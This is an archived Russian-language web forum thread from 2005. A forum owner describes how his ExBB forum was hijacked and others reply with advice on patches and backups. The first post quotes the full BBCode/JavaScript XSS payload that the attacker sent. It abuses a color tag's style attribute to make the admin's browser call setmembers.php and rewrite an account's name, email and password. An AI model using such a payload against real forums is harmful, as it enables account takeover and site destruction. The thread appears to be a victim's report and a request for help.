ТвойWeb :: Версия для печати

1. Alone - 12 Января, 2005 - 15:46:04 - перейти к сообщению

Сегодня мой форум полностью взломали.
Удалили все форумы и администратора.

Перед этим мне как админу прислали сообщение через форум:

CODE:

[q][color='z=]'style='background:url(javascript:location.href="http://www.здесьмойсайт.ru/forum/setmembers.php?
action=edit_user&checkaction=yes&userid=84&membertitle=&emailaddress=lol@lol.
ru&newname=KillBill&password=&homepage=&aolname=&icqnumber=&location=&interests=
&singnature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%
EF%F0%E0%E2&E8%F2%FC")'[/color][/q]

Потом оставили один форум с одной темой в которой было написано это:

Этот форум взломан форумным роботом, удаляющим все темы и всех пользователей!

АГЕНСТВО HACK-SERVICE
Взлом систем, алгоритмов, баз данных, почтовых аккаунтов, сайтов и систем обработки веб-скриптов!
http://hack-service.narod.ru

***************

IP адрес этого чёрта:
IP : [ 212.98.176.25 ]

Сейчас я кое-что востановновил, чёрта этого забанил. Но увереннности нет что это не повторится.

Есть какие-нибудь пожелания? Улыбка

2. TvoyWeb - 12 Января, 2005 - 16:12:08 - перейти к сообщению

Alone
Мда....... надо было поставить все секьюрные обновления и делать бекап регулярно. Эти дырки давно были закрыты.

3. Alone - 12 Января, 2005 - 16:16:06 - перейти к сообщению

Можно ссылки где эти обновления скачать и как поставить?

4. TvoyWeb - 12 Января, 2005 - 16:17:21 - перейти к сообщению

Alone пишет:

Можно ссылки где эти обновления скачать и как поставить?

Завтра выложу здесь этот файл.

5. Владимир - 12 Января, 2005 - 16:32:09 - перейти к сообщению

TvoyWeb
Скажи в версии что была месяц назад это уже исправлено? Я пытался проверить на своем. Хакнуть не получилось, но может сделал чего не так.
Явно видео что на http://www.exbb.net насмотрелись... Даже "color" не поменяли на что-нибудь более оригинальное. Уроды. Нахмурился

6. TvoyWeb - 12 Января, 2005 - 16:32:18 - перейти к сообщению

А вообще надо было бы сразу, как увидел это сообщение и не понял в чем дело прийти сюда и спросить. Возможно еще успели бы твой форум спасти. И потом эта бяка работает только из под IE, вернее работала.

7. Alone - 12 Января, 2005 - 16:38:52 - перейти к сообщению

Да, ладно, учимся на ошибках. Главное что форум ещё молодой немного всего накопилось.

8. TvoyWeb - 12 Января, 2005 - 16:39:40 - перейти к сообщению

Старатель пишет:

Скажи в версии что была месяц назад это уже исправлено?

Обновление то вышло давно..... вот дело в том что Warlock мог не обновить архив. Он недавно в Москву перехал и дома компа нет, а на работе у него времени нет форумом заниматься.
Как уже сказал, я завтра выложу обновленный файл lib.php, со всеми заплатками которые сам на своем форуме ставил.
И потом я уже сказал, что это только под IE работает. Например о дырке через IE описанной в теме "Обнаружена новая уязвимость в форуме ExBB" на ExBB вроде еще никто не знает.

9. Mazej - 12 Января, 2005 - 16:40:43 - перейти к сообщению

Вот как я поставил форум я начал заходить на главный форум http://www.exbb.revansh.com/ там читал и скачивал обновления, а вот я только понять не могу, как форум взламывается?

10. Alone - 12 Января, 2005 - 16:52:46 - перейти к сообщению

Mazej

Видимо высылается что-то о файле админа.